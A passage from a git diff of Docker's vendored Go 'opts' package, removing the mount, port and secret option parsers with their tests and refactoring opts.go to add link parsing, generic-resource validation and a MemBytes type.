mounttypes.TypeBind { - return fmt.Errorf("cannot mix 'bind-*' options with mount type '%s'", mount.Type) - } - if mount.TmpfsOptions != nil && mount.Type != mounttypes.TypeTmpfs { - return fmt.Errorf("cannot mix 'tmpfs-*' options with mount type '%s'", mount.Type) - } - - m.values = append(m.values, mount) - return nil -} - -// Type returns the type of this option -func (m *MountOpt) Type() string { - return "mount" -} - -// String returns a string repr of this option -func (m *MountOpt) String() string { - mounts := []string{} - for _, mount := range m.values { - repr := fmt.Sprintf("%s %s %s", mount.Type, mount.Source, mount.Target) - mounts = append(mounts, repr) - } - return strings.Join(mounts, ", ") -} - -// Value returns the mounts -func (m *MountOpt) Value() []mounttypes.Mount { - return m.values -} diff --git a/vendor/github.com/docker/docker/opts/mount_test.go b/vendor/github.com/docker/docker/opts/mount_test.go deleted file mode 100644 index 59606c38e2..0000000000 --- a/vendor/github.com/docker/docker/opts/mount_test.go +++ /dev/null @@ -1,184 +0,0 @@ -package opts - -import ( - "os" - "testing" - - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestMountOptString(t *testing.T) { - mount := MountOpt{ - values: []mounttypes.Mount{ - { - Type: mounttypes.TypeBind, - Source: "/home/path", - Target: "/target", - }, - { - Type: mounttypes.TypeVolume, - Source: "foo", - Target: "/target/foo", - }, - }, - } - expected := "bind /home/path /target, volume foo /target/foo" - assert.Equal(t, mount.String(), expected) -} - -func TestMountOptSetBindNoErrorBind(t *testing.T) { - for _, testcase := range []string{ - // tests several aliases that should have same result. - "type=bind,target=/target,source=/source", - "type=bind,src=/source,dst=/target", - "type=bind,source=/source,dst=/target", - "type=bind,src=/source,target=/target", - } { - var mount MountOpt - - assert.NilError(t, mount.Set(testcase)) - - mounts := mount.Value() - assert.Equal(t, len(mounts), 1) - assert.Equal(t, mounts[0], mounttypes.Mount{ - Type: mounttypes.TypeBind, - Source: "/source", - Target: "/target", - }) - } -} - -func TestMountOptSetVolumeNoError(t *testing.T) { - for _, testcase := range []string{ - // tests several aliases that should have same result. - "type=volume,target=/target,source=/source", - "type=volume,src=/source,dst=/target", - "type=volume,source=/source,dst=/target", - "type=volume,src=/source,target=/target", - } { - var mount MountOpt - - assert.NilError(t, mount.Set(testcase)) - - mounts := mount.Value() - assert.Equal(t, len(mounts), 1) - assert.Equal(t, mounts[0], mounttypes.Mount{ - Type: mounttypes.TypeVolume, - Source: "/source", - Target: "/target", - }) - } -} - -// TestMountOptDefaultType ensures that a mount without the type defaults to a -// volume mount. -func TestMountOptDefaultType(t *testing.T) { - var mount MountOpt - assert.NilError(t, mount.Set("target=/target,source=/foo")) - assert.Equal(t, mount.values[0].Type, mounttypes.TypeVolume) -} - -func TestMountOptSetErrorNoTarget(t *testing.T) { - var mount MountOpt - assert.Error(t, mount.Set("type=volume,source=/foo"), "target is required") -} - -func TestMountOptSetErrorInvalidKey(t *testing.T) { - var mount MountOpt - assert.Error(t, mount.Set("type=volume,bogus=foo"), "unexpected key 'bogus'") -} - -func TestMountOptSetErrorInvalidField(t *testing.T) { - var mount MountOpt - assert.Error(t, mount.Set("type=volume,bogus"), "invalid field 'bogus'") -} - -func TestMountOptSetErrorInvalidReadOnly(t *testing.T) { - var mount MountOpt - assert.Error(t, mount.Set("type=volume,readonly=no"), "invalid value for readonly: no") - assert.Error(t, mount.Set("type=volume,readonly=invalid"), "invalid value for readonly: invalid") -} - -func TestMountOptDefaultEnableReadOnly(t *testing.T) { - var m MountOpt - assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo")) - assert.Equal(t, m.values[0].ReadOnly, false) - - m = MountOpt{} - assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly")) - assert.Equal(t, m.values[0].ReadOnly, true) - - m = MountOpt{} - assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=1")) - assert.Equal(t, m.values[0].ReadOnly, true) - - m = MountOpt{} - assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=true")) - assert.Equal(t, m.values[0].ReadOnly, true) - - m = MountOpt{} - assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=0")) - assert.Equal(t, m.values[0].ReadOnly, false) -} - -func TestMountOptVolumeNoCopy(t *testing.T) { - var m MountOpt - assert.NilError(t, m.Set("type=volume,target=/foo,volume-nocopy")) - assert.Equal(t, m.values[0].Source, "") - - m = MountOpt{} - assert.NilError(t, m.Set("type=volume,target=/foo,source=foo")) - assert.Equal(t, m.values[0].VolumeOptions == nil, true) - - m = MountOpt{} - assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=true")) - assert.Equal(t, m.values[0].VolumeOptions != nil, true) - assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) - - m = MountOpt{} - assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy")) - assert.Equal(t, m.values[0].VolumeOptions != nil, true) - assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) - - m = MountOpt{} - assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=1")) - assert.Equal(t, m.values[0].VolumeOptions != nil, true) - assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true) -} - -func TestMountOptTypeConflict(t *testing.T) { - var m MountOpt - assert.Error(t, m.Set("type=bind,target=/foo,source=/foo,volume-nocopy=true"), "cannot mix") - assert.Error(t, m.Set("type=volume,target=/foo,source=/foo,bind-propagation=rprivate"), "cannot mix") -} - -func TestMountOptSetTmpfsNoError(t *testing.T) { - for _, testcase := range []string{ - // tests several aliases that should have same result. - "type=tmpfs,target=/target,tmpfs-size=1m,tmpfs-mode=0700", - "type=tmpfs,target=/target,tmpfs-size=1MB,tmpfs-mode=700", - } { - var mount MountOpt - - assert.NilError(t, mount.Set(testcase)) - - mounts := mount.Value() - assert.Equal(t, len(mounts), 1) - assert.DeepEqual(t, mounts[0], mounttypes.Mount{ - Type: mounttypes.TypeTmpfs, - Target: "/target", - TmpfsOptions: &mounttypes.TmpfsOptions{ - SizeBytes: 1024 * 1024, // not 1000 * 1000 - Mode: os.FileMode(0700), - }, - }) - } -} - -func TestMountOptSetTmpfsError(t *testing.T) { - var m MountOpt - assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-size=foo"), "invalid value for tmpfs-size") - assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-mode=foo"), "invalid value for tmpfs-mode") - assert.Error(t, m.Set("type=tmpfs"), "target is required") -} diff --git a/vendor/github.com/docker/docker/opts/opts.go b/vendor/github.com/docker/docker/opts/opts.go index ae851537ec..de8aacb806 100644 --- a/vendor/github.com/docker/docker/opts/opts.go +++ b/vendor/github.com/docker/docker/opts/opts.go @@ -1,13 +1,13 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" - "math/big" "net" + "path" "regexp" "strings" - "github.com/docker/docker/api/types/filters" + "github.com/docker/go-units" ) var ( @@ -36,7 +36,10 @@ func NewListOptsRef(values *[]string, validator ValidatorFctType) *ListOpts { } func (opts *ListOpts) String() string { - return fmt.Sprintf("%v", []string((*opts.values))) + if len(*opts.values) == 0 { + return "" + } + return fmt.Sprintf("%v", *opts.values) } // Set validates if needed the input value and adds it to the @@ -49,7 +52,7 @@ func (opts *ListOpts) Set(value string) error { } value = v } - (*opts.values) = append((*opts.values), value) + *opts.values = append(*opts.values, value) return nil } @@ -57,7 +60,7 @@ func (opts *ListOpts) Set(value string) error { func (opts *ListOpts) Delete(key string) { for i, k := range *opts.values { if k == key { - (*opts.values) = append((*opts.values)[:i], (*opts.values)[i+1:]...) + *opts.values = append((*opts.values)[:i], (*opts.values)[i+1:]...) return } } @@ -75,7 +78,7 @@ func (opts *ListOpts) GetMap() map[string]struct{} { // GetAll returns the values of slice. func (opts *ListOpts) GetAll() []string { - return (*opts.values) + return *opts.values } // GetAllOrEmpty returns the values of the slice @@ -100,7 +103,7 @@ func (opts *ListOpts) Get(key string) bool { // Len returns the amount of element in the slice. func (opts *ListOpts) Len() int { - return len((*opts.values)) + return len(*opts.values) } // Type returns a string name for this Option type @@ -108,6 +111,12 @@ func (opts *ListOpts) Type() string { return "list" } +// WithValidator returns the ListOpts with validator set. +func (opts *ListOpts) WithValidator(validator ValidatorFctType) *ListOpts { + opts.validator = validator + return opts +} + // NamedOption is an interface that list and map options // with names implement. type NamedOption interface { @@ -168,7 +177,7 @@ func (opts *MapOpts) GetAll() map[string]string { } func (opts *MapOpts) String() string { - return fmt.Sprintf("%v", map[string]string((opts.values))) + return fmt.Sprintf("%v", opts.values) } // Type returns a string name for this Option type @@ -254,107 +263,75 @@ func ValidateLabel(val string) (string, error) { return val, nil } -// ValidateSysctl validates a sysctl and returns it. -func ValidateSysctl(val string) (string, error) { - validSysctlMap := map[string]bool{ - "kernel.msgmax": true, - "kernel.msgmnb": true, - "kernel.msgmni": true, - "kernel.sem": true, - "kernel.shmall": true, - "kernel.shmmax": true, - "kernel.shmmni": true, - "kernel.shm_rmid_forced": true, +// ValidateSingleGenericResource validates that a single entry in the +// generic resource list is valid. +// i.e 'GPU=UID1' is valid however 'GPU:UID1' or 'UID1' isn't +func ValidateSingleGenericResource(val string) (string, error) { + if strings.Count(val, "=") < 1 { + return "", fmt.Errorf("invalid node-generic-resource format `%s` expected `name=value`", val) } - validSysctlPrefixes := []string{ - "net.", - "fs.mqueue.", + return val, nil +} + +// ParseLink parses and validates the specified string as a link format (name:alias) +func ParseLink(val string) (string, string, error) { + if val == "" { + return "", "", fmt.Errorf("empty string specified for links") } - arr := strings.Split(val, "=") - if len(arr) < 2 { - return "", fmt.Errorf("sysctl '%s' is not whitelisted", val) + arr := strings.Split(val, ":") + if len(arr) > 2 { + return "", "", fmt.Errorf("bad format for links: %s", val) } - if validSysctlMap[arr[0]] { - return val, nil + if len(arr) == 1 { + return val, val, nil } - - for _, vp := range validSysctlPrefixes { - if strings.HasPrefix(arr[0], vp) { - return val, nil - } + // This is kept because we can actually get a HostConfig with links + // from an already created container and the format is not `foo:bar` + // but `/foo:/c1/bar` + if strings.HasPrefix(arr[0], "/") { + _, alias := path.Split(arr[1]) + return arr[0][1:], alias, nil } - return "", fmt.Errorf("sysctl '%s' is not whitelisted", val) + return arr[0], arr[1], nil } -// FilterOpt is a flag type for validating filters -type FilterOpt struct { - filter filters.Args -} - -// NewFilterOpt returns a new FilterOpt -func NewFilterOpt() FilterOpt { - return FilterOpt{filter: filters.NewArgs()} -} +// MemBytes is a type for human readable memory bytes (like 128M, 2g, etc) +type MemBytes int64 -func (o *FilterOpt) String() string { - repr, err := filters.ToParam(o.filter) - if err != nil { - return "invalid filters" +// String returns the string format of the human readable memory bytes +func (m *MemBytes) String() string { + // NOTE: In spf13/pflag/flag.go, "0" is considered as "zero value" while "0 B" is not. + // We return "0" in case value is 0 here so that the default value is hidden. + // (Sometimes "default 0 B" is actually misleading) + if m.Value() != 0 { + return units.BytesSize(float64(m.Value())) } - return repr + return "0" } -// Set sets the value of the opt by parsing the command line value -func (o *FilterOpt) Set(value string) error { - var err error - o.filter, err = filters.ParseFlag(value, o.filter) - return err -} - -// Type returns the option type -func (o *FilterOpt) Type() string { - return "filter" -} - -// Value returns the value of this option -func (o *FilterOpt) Value() filters.Args { - return o.filter -} - -// NanoCPUs is a type for fixed point fractional number. -type NanoCPUs int64 - -// String returns the string format of the number -func (c *NanoCPUs) String() string { - return big.NewRat(c.Value(), 1e9).FloatString(3) -} - -// Set sets the value of the NanoCPU by passing a string -func (c *NanoCPUs) Set(value string) error { - cpus, err := ParseCPUs(value) - *c = NanoCPUs(cpus) +// Set sets the value of the MemBytes by passing a string +func (m *MemBytes) Set(value string) error { + val, err := units.RAMInBytes(value) + *m = MemBytes(val) return err } // Type returns the type -func (c *NanoCPUs) Type() string { - return "decimal" +func (m *MemBytes) Type() string { + return "bytes" } // Value returns the value in int64 -func (c *NanoCPUs) Value() int64 { - return int64(*c) +func (m *MemBytes) Value() int64 { + return int64(*m) } -// ParseCPUs takes a string ratio and returns an integer value of nano cpus -func ParseCPUs(value string) (int64, error) { - cpu, ok := new(big.Rat).SetString(value) - if !ok { - return 0, fmt.Errorf("failed to parse %v as a rational number", value) - } - nano := cpu.Mul(cpu, big.NewRat(1e9, 1)) - if !nano.IsInt() { - return 0, fmt.Errorf("value is too precise") +// UnmarshalJSON is the customized unmarshaler for MemBytes +func (m *MemBytes) UnmarshalJSON(s []byte) error { + if len(s) <= 2 || s[0] != '"' || s[len(s)-1] != '"' { + return fmt.Errorf("invalid size: %q", s) } - return nano.Num().Int64(), nil + val, err := units.RAMInBytes(string(s[1 : len(s)-1])) + *m = MemBytes(val) + return err } diff --git a/vendor/github.com/docker/docker/opts/opts_test.go b/vendor/github.com/docker/docker/opts/opts_test.go index 9f41e47864..577395edcb 100644 --- a/vendor/github.com/docker/docker/opts/opts_test.go +++ b/vendor/github.com/docker/docker/opts/opts_test.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" @@ -50,7 +50,7 @@ func TestMapOpts(t *testing.T) { t.Errorf("max-size = %s != 1", tmpMap["max-size"]) } if o.Set("dummy-val=3") == nil { - t.Errorf("validator is not being called") + t.Error("validator is not being called") } } @@ -93,12 +93,12 @@ func TestListOptsWithValidator(t *testing.T) { // Re-using logOptsvalidator (used by MapOpts) o := NewListOpts(logOptsValidator) o.Set("foo") - if o.String() != "[]" { - t.Errorf("%s != []", o.String()) + if o.String() != "" { + t.Errorf(`%s != ""`, o.String()) } o.Set("foo=bar") - if o.String() != "[]" { - t.Errorf("%s != []", o.String()) + if o.String() != "" { + t.Errorf(`%s != ""`, o.String()) } o.Set("max-file=2") if o.Len() != 1 { @@ -111,8 +111,8 @@ func TestListOptsWithValidator(t *testing.T) { t.Error("o.Get(\"baz\") == true") } o.Delete("max-file=2") - if o.String() != "[]" { - t.Errorf("%s != []", o.String()) + if o.String() != "" { + t.Errorf(`%s != ""`, o.String()) } } @@ -157,7 +157,7 @@ func TestValidateDNSSearch(t *testing.T) { `foo.bar-.baz`, `foo.-bar`, `foo.-bar.baz`, - `foo.bar.baz.this.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbe`, + `foo.bar.baz.this.should.fail.on.long.name.because.it.is.longer.thanitshouldbethis.should.fail.on.long.name.because.it.is.longer.thanitshouldbethis.should.fail.on.long.name.because.it.is.longer.thanitshouldbethis.should.fail.on.long.name.because.it.is.longer.thanitshouldbe`, } for _, domain := range valid { @@ -230,3 +230,35 @@ func TestNamedMapOpts(t *testing.T) { t.Errorf("expected map-size to be in the values, got %v", tmpMap) } } + +func TestParseLink(t *testing.T) { + name, alias, err := ParseLink("name:alias") + if err != nil { + t.Fatalf("Expected not to error out on a valid name:alias format but got: %v", err) + } + if name != "name" { + t.Fatalf("Link name should have been name, got %s instead", name) + } + if alias != "alias" { + t.Fatalf("Link alias should have been alias, got %s instead", alias) + } + // short format definition + name, alias, err = ParseLink("name") + if err != nil { + t.Fatalf("Expected not to error out on a valid name only format but got: %v", err) + } + if name != "name" { + t.Fatalf("Link name should have been name, got %s instead", name) + } + if alias != "name" { + t.Fatalf("Link alias should have been name, got %s instead", alias) + } + // empty string link definition is not allowed + if _, _, err := ParseLink(""); err == nil || !strings.Contains(err.Error(), "empty string specified for links") { + t.Fatalf("Expected error 'empty string specified for links' but got: %v", err) + } + // more than two colons are not allowed + if _, _, err := ParseLink("link:alias:wrong"); err == nil || !strings.Contains(err.Error(), "bad format for links: link:alias:wrong") { + t.Fatalf("Expected error 'bad format for links: link:alias:wrong' but got: %v", err) + } +} diff --git a/vendor/github.com/docker/docker/opts/opts_unix.go b/vendor/github.com/docker/docker/opts/opts_unix.go index f1ce844a8f..0c32367cb2 100644 --- a/vendor/github.com/docker/docker/opts/opts_unix.go +++ b/vendor/github.com/docker/docker/opts/opts_unix.go @@ -1,6 +1,6 @@ // +build !windows -package opts +package opts // import "github.com/docker/docker/opts" -// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. docker daemon -H tcp://:8080 +// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. dockerd -H tcp://:8080 const DefaultHTTPHost = "localhost" diff --git a/vendor/github.com/docker/docker/opts/opts_windows.go b/vendor/github.com/docker/docker/opts/opts_windows.go index ebe40c969c..0e1b6c6d18 100644 --- a/vendor/github.com/docker/docker/opts/opts_windows.go +++ b/vendor/github.com/docker/docker/opts/opts_windows.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" // TODO Windows. Identify bug in GOLang 1.5.1+ and/or Windows Server 2016 TP5. // @jhowardmsft, @swernli. @@ -52,5 +52,5 @@ package opts // to the delay if a user were to do 'docker run -H=tcp://localhost:2375...' // explicitly. -// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. docker daemon -H tcp://:8080 +// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. dockerd -H tcp://:8080 const DefaultHTTPHost = "127.0.0.1" diff --git a/vendor/github.com/docker/docker/opts/port.go b/vendor/github.com/docker/docker/opts/port.go deleted file mode 100644 index 020a5d1e1c..0000000000 --- a/vendor/github.com/docker/docker/opts/port.go +++ /dev/null @@ -1,146 +0,0 @@ -package opts - -import ( - "encoding/csv" - "fmt" - "regexp" - "strconv" - "strings" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/go-connections/nat" -) - -const ( - portOptTargetPort = "target" - portOptPublishedPort = "published" - portOptProtocol = "protocol" - portOptMode = "mode" -) - -// PortOpt represents a port config in swarm mode. -type PortOpt struct { - ports []swarm.PortConfig -} - -// Set a new port value -func (p *PortOpt) Set(value string) error { - longSyntax, err := regexp.MatchString(`\w+=\w+(,\w+=\w+)*`, value) - if err != nil { - return err - } - if longSyntax { - csvReader := csv.NewReader(strings.NewReader(value)) - fields, err := csvReader.Read() - if err != nil { - return err - } - - pConfig := swarm.PortConfig{} - for _, field := range fields { - parts := strings.SplitN(field, "=", 2) - if len(parts) != 2 { - return fmt.Errorf("invalid field %s", field) - } - - key := strings.ToLower(parts[0]) - value := strings.ToLower(parts[1]) - - switch key { - case portOptProtocol: - if value != string(swarm.PortConfigProtocolTCP) && value != string(swarm.PortConfigProtocolUDP) { - return fmt.Errorf("invalid protocol value %s", value) - } - - pConfig.Protocol = swarm.PortConfigProtocol(value) - case portOptMode: - if value != string(swarm.PortConfigPublishModeIngress) && value != string(swarm.PortConfigPublishModeHost) { - return fmt.Errorf("invalid publish mode value %s", value) - } - - pConfig.PublishMode = swarm.PortConfigPublishMode(value) - case portOptTargetPort: - tPort, err := strconv.ParseUint(value, 10, 16) - if err != nil { - return err - } - - pConfig.TargetPort = uint32(tPort) - case portOptPublishedPort: - pPort, err := strconv.ParseUint(value, 10, 16) - if err != nil { - return err - } - - pConfig.PublishedPort = uint32(pPort) - default: - return fmt.Errorf("invalid field key %s", key) - } - } - - if pConfig.TargetPort == 0 { - return fmt.Errorf("missing mandatory field %q", portOptTargetPort) - } - - if pConfig.PublishMode == "" { - pConfig.PublishMode = swarm.PortConfigPublishModeIngress - } - - if pConfig.Protocol == "" { - pConfig.Protocol = swarm.PortConfigProtocolTCP - } - - p.ports = append(p.ports, pConfig) - } else { - // short syntax - portConfigs := []swarm.PortConfig{} - // We can ignore errors because the format was already validated by ValidatePort - ports, portBindings, _ := nat.ParsePortSpecs([]string{value}) - - for port := range ports { - portConfigs = append(portConfigs, ConvertPortToPortConfig(port, portBindings)...) - } - p.ports = append(p.ports, portConfigs...) - } - return nil -} - -// Type returns the type of this option -func (p *PortOpt) Type() string { - return "port" -} - -// String returns a string repr of this option -func (p *PortOpt) String() string { - ports := []string{} - for _, port := range p.ports { - repr := fmt.Sprintf("%v:%v/%s/%s", port.PublishedPort, port.TargetPort, port.Protocol, port.PublishMode) - ports = append(ports, repr) - } - return strings.Join(ports, ", ") -} - -// Value returns the ports -func (p *PortOpt) Value() []swarm.PortConfig { - return p.ports -} - -// ConvertPortToPortConfig converts ports to the swarm type -func ConvertPortToPortConfig( - port nat.Port, - portBindings map[nat.Port][]nat.PortBinding, -) []swarm.PortConfig { - ports := []swarm.PortConfig{} - - for _, binding := range portBindings[port] { - hostPort, _ := strconv.ParseUint(binding.HostPort, 10, 16) - ports = append(ports, swarm.PortConfig{ - //TODO Name: ? - Protocol: swarm.PortConfigProtocol(strings.ToLower(port.Proto())), - TargetPort: uint32(port.Int()), - PublishedPort: uint32(hostPort), - PublishMode: swarm.PortConfigPublishModeIngress, - }) - } - return ports -} diff --git a/vendor/github.com/docker/docker/opts/port_test.go b/vendor/github.com/docker/docker/opts/port_test.go deleted file mode 100644 index 67bcf8f1d9..0000000000 --- a/vendor/github.com/docker/docker/opts/port_test.go +++ /dev/null @@ -1,259 +0,0 @@ -package opts - -import ( - "testing" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestPortOptValidSimpleSyntax(t *testing.T) { - testCases := []struct { - value string - expected []swarm.PortConfig - }{ - { - value: "80", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "80:8080", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 8080, - PublishedPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "8080:80/tcp", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 80, - PublishedPort: 8080, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "80:8080/udp", - expected: []swarm.PortConfig{ - { - Protocol: "udp", - TargetPort: 8080, - PublishedPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "80-81:8080-8081/tcp", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 8080, - PublishedPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - { - Protocol: "tcp", - TargetPort: 8081, - PublishedPort: 81, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "80-82:8080-8082/udp", - expected: []swarm.PortConfig{ - { - Protocol: "udp", - TargetPort: 8080, - PublishedPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - { - Protocol: "udp", - TargetPort: 8081, - PublishedPort: 81, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - { - Protocol: "udp", - TargetPort: 8082, - PublishedPort: 82, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - } - for _, tc := range testCases { - var port PortOpt - assert.NilError(t, port.Set(tc.value)) - assert.Equal(t, len(port.Value()), len(tc.expected)) - for _, expectedPortConfig := range tc.expected { - assertContains(t, port.Value(), expectedPortConfig) - } - } -} - -func TestPortOptValidComplexSyntax(t *testing.T) { - testCases := []struct { - value string - expected []swarm.PortConfig - }{ - { - value: "target=80", - expected: []swarm.PortConfig{ - { - TargetPort: 80, - Protocol: "tcp", - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "target=80,protocol=tcp", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "target=80,published=8080,protocol=tcp", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 80, - PublishedPort: 8080, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "published=80,target=8080,protocol=tcp", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 8080, - PublishedPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "target=80,published=8080,protocol=tcp,mode=host", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 80, - PublishedPort: 8080, - PublishMode: "host", - }, - }, - }, - { - value: "target=80,published=8080,mode=host", - expected: []swarm.PortConfig{ - { - TargetPort: 80, - PublishedPort: 8080, - PublishMode: "host", - Protocol: "tcp", - }, - }, - }, - { - value: "target=80,published=8080,mode=ingress", - expected: []swarm.PortConfig{ - { - TargetPort: 80, - PublishedPort: 8080, - PublishMode: "ingress", - Protocol: "tcp", - }, - }, - }, - } - for _, tc := range testCases { - var port PortOpt - assert.NilError(t, port.Set(tc.value)) - assert.Equal(t, len(port.Value()), len(tc.expected)) - for _, expectedPortConfig := range tc.expected { - assertContains(t, port.Value(), expectedPortConfig) - } - } -} - -func TestPortOptInvalidComplexSyntax(t *testing.T) { - testCases := []struct { - value string - expectedError string - }{ - { - value: "invalid,target=80", - expectedError: "invalid field", - }, - { - value: "invalid=field", - expectedError: "invalid field", - }, - { - value: "protocol=invalid", - expectedError: "invalid protocol value", - }, - { - value: "target=invalid", - expectedError: "invalid syntax", - }, - { - value: "published=invalid", - expectedError: "invalid syntax", - }, - { - value: "mode=invalid", - expectedError: "invalid publish mode value", - }, - { - value: "published=8080,protocol=tcp,mode=ingress", - expectedError: "missing mandatory field", - }, - { - value: `target=80,protocol="tcp,mode=ingress"`, - expectedError: "non-quoted-field", - }, - { - value: `target=80,"protocol=tcp,mode=ingress"`, - expectedError: "invalid protocol value", - }, - } - for _, tc := range testCases { - var port PortOpt - assert.Error(t, port.Set(tc.value), tc.expectedError) - } -} - -func assertContains(t *testing.T, portConfigs []swarm.PortConfig, expected swarm.PortConfig) { - var contains = false - for _, portConfig := range portConfigs { - if portConfig == expected { - contains = true - break - } - } - if !contains { - t.Errorf("expected %v to contain %v, did not", portConfigs, expected) - } -} diff --git a/vendor/github.com/docker/docker/opts/quotedstring.go b/vendor/github.com/docker/docker/opts/quotedstring.go index fb1e5374bc..6c889070e8 100644 --- a/vendor/github.com/docker/docker/opts/quotedstring.go +++ b/vendor/github.com/docker/docker/opts/quotedstring.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" // QuotedString is a string that may have extra quotes around the value. The // quotes are stripped from the value. @@ -18,7 +18,7 @@ func (s *QuotedString) Type() string { } func (s *QuotedString) String() string { - return string(*s.value) + return *s.value } func trimQuotes(value string) string { diff --git a/vendor/github.com/docker/docker/opts/quotedstring_test.go b/vendor/github.com/docker/docker/opts/quotedstring_test.go index 0ebf04bbe0..89fed6cfa6 100644 --- a/vendor/github.com/docker/docker/opts/quotedstring_test.go +++ b/vendor/github.com/docker/docker/opts/quotedstring_test.go @@ -1,28 +1,30 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( - "github.com/docker/docker/pkg/testutil/assert" "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestQuotedStringSetWithQuotes(t *testing.T) { value := "" qs := NewQuotedString(&value) - assert.NilError(t, qs.Set("\"something\"")) - assert.Equal(t, qs.String(), "something") - assert.Equal(t, value, "something") + assert.Check(t, qs.Set(`"something"`)) + assert.Check(t, is.Equal("something", qs.String())) + assert.Check(t, is.Equal("something", value)) } func TestQuotedStringSetWithMismatchedQuotes(t *testing.T) { value := "" qs := NewQuotedString(&value) - assert.NilError(t, qs.Set("\"something'")) - assert.Equal(t, qs.String(), "\"something'") + assert.Check(t, qs.Set(`"something'`)) + assert.Check(t, is.Equal(`"something'`, qs.String())) } func TestQuotedStringSetWithNoQuotes(t *testing.T) { value := "" qs := NewQuotedString(&value) - assert.NilError(t, qs.Set("something")) - assert.Equal(t, qs.String(), "something") + assert.Check(t, qs.Set("something")) + assert.Check(t, is.Equal("something", qs.String())) } diff --git a/vendor/github.com/docker/docker/runconfig/opts/runtime.go b/vendor/github.com/docker/docker/opts/runtime.go similarity index 97% rename from vendor/github.com/docker/docker/runconfig/opts/runtime.go rename to vendor/github.com/docker/docker/opts/runtime.go index 4361b3ce09..4b9babf0a5 100644 --- a/vendor/github.com/docker/docker/runconfig/opts/runtime.go +++ b/vendor/github.com/docker/docker/opts/runtime.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" diff --git a/vendor/github.com/docker/docker/opts/secret.go b/vendor/github.com/docker/docker/opts/secret.go deleted file mode 100644 index 1fefcf8434..0000000000 --- a/vendor/github.com/docker/docker/opts/secret.go +++ /dev/null @@ -1,107 +0,0 @@ -package opts - -import ( - "encoding/csv" - "fmt" - "os" - "path/filepath" - "strconv" - "strings" - - "github.com/docker/docker/api/types" -) - -// SecretOpt is a Value type for parsing secrets -type SecretOpt struct { - values []*types.SecretRequestOption -} - -// Set a new secret value -func (o *SecretOpt) Set(value string) error { - csvReader := csv.NewReader(strings.NewReader(value)) - fields, err := csvReader.Read() - if err != nil { - return err - } - - options := &types.SecretRequestOption{ - Source: "", - Target: "", - UID: "0", - GID: "0", - Mode: 0444, - } - - // support a simple syntax of --secret foo - if len(fields) == 1 { - options.Source = fields[0] - options.Target = fields[0] - o.values = append(o.values, options) - return nil - } - - for _, field := range fields { - parts := strings.SplitN(field, "=", 2) - key := strings.ToLower(parts[0]) - - if len(parts) != 2 { - return fmt.Errorf("invalid field '%s' must be a key=value pair", field) - } - - value := parts[1] - switch key { - case "source", "src": - options.Source = value - case "target": - tDir, _ := filepath.Split(value) - if tDir != "" { - return fmt.Errorf("target must not be a path") - } - options.Target = value - case "uid": - options.UID = value - case "gid": - options.GID = value - case "mode": - m, err := strconv.ParseUint(value, 0, 32) - if err != nil { - return fmt.Errorf("invalid mode specified: %v", err) - } - - options.Mode = os.FileMode(m) - default: - if len(fields) == 1 && value == "" { - - } else { - return fmt.Errorf("invalid field in secret request: %s", key) - } - } - } - - if options.Source == "" { - return fmt.Errorf("source is required") - } - - o.values = 